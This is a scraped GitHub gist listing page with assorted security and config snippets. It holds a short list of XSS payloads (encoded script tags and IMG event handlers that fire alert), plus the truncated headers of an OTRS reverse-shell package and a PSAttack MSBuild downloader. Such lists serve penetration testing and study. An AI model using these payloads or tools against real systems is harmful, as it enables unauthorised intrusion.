Skip to content

Instantly share code, notes, and snippets.

View ResistanceIsUseless's full-sized avatar
:shipit:
trying to switch timelines

StaticBunny ResistanceIsUseless

:shipit:
trying to switch timelines
View GitHub Profile
@kurobeats
kurobeats / xss_vectors.txt
Last active July 14, 2025 12:55
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
@Paradoxis
Paradoxis / agressive-url-encode.md
Last active February 10, 2024 23:00
Agressive URL encode

Agressive URL encode

Python based CLI tool to agressively url-encode strings, rather than just encoding non-url characters this tool will encode every character in the URL.

Usage:

Firstly make a function in your .bash_profile to call the script

function url-encode()
{
 python ~//url_encode.py $@
Reviews of people who've taken the exam:
http://www.securitysift.com/offsec-pwb-oscp/ - great detail and pythong scripts
https://codemonkeyism.co.uk/the-road-to-oscp/
http://www.jasonbernier.com/oscp-review/
https://www.cybrary.it/0p3n/prep-guide-offsecs-pwkoscp/
https://itgeekchronicles.co.uk/2012/10/10/oscp-useful-resources/
http://n3ko1.github.io/certification/2015/05/27/oscp---offensive-security-certified-professional/ (very good!!)
Windows Priviledge Escalation
@pierre-b
pierre-b / config.fish
Created March 6, 2017 10:03
golang fish shell config
# config file
# vim ~/.config/fish/config.fish
# reload the config
# source ~/.config/fish/config.fish
# set the workspace path
set -x GOPATH /users/my-username/go
# add the go bin path to be able to execute our programs
@jivoi
jivoi / offsec.md
Last active June 18, 2025 14:53
Penetrating Testing/Assessment Workflow

Penetrating Testing/Assessment Workflow & other fun infosec stuff

https://github.com/jivoi/pentest

My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tip and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*

@natesubra
natesubra / OTRSPwner.opm
Created January 3, 2017 03:14
OPM reverse shell for linux OTRS installs
<?xml version="1.0" encoding="utf-8"?>
<otrs_package version="1.0">
<Name>OTRS Command Runner</Name>
<Version>1.0</Version>
<Framework>5.0.x</Framework>
<Vendor>scrubs</Vendor>
<Description Lang="en">A module to own boxes with OTRS more quickly.</Description>
<License>MIT License</License>
<CodeInstall><![CDATA[
@taxilian
taxilian / 1- README.md
Last active July 9, 2019 15:24
Example nginx config to reverse proxy to three different octoprint servers from one domain

Purpose

I have three printers; each uses a raspberry pi that runs OctoPrint. I wanted to be able to give people a single page to see all of the webcams, what they are printing with ETL (est time left), and what the current temperatures are.

This demonstrates how I did that. Email me at [email protected] if you'd like to see a live demo -- I don't want every bot on the web looking at my cameras and using CPU cycles.

License

@mubix
mubix / infosec_newbie.md
Last active July 10, 2025 04:30
How to start in Infosec
@NickTyrer
NickTyrer / PSA64.cs
Created November 19, 2016 08:45
PSAttack Using MSBuild Downloader
This file has been truncated, but you can view the full file.
//Credits to Casey Smith for his initial research here "https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371"
//Based on Jared Haight work (https://github.com/jaredhaight/PSAttack)
//1. Compile "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:PSA64.exe PSA64.cs"
using System;
using System.Reflection;
namespace PSA64
{
class Program
{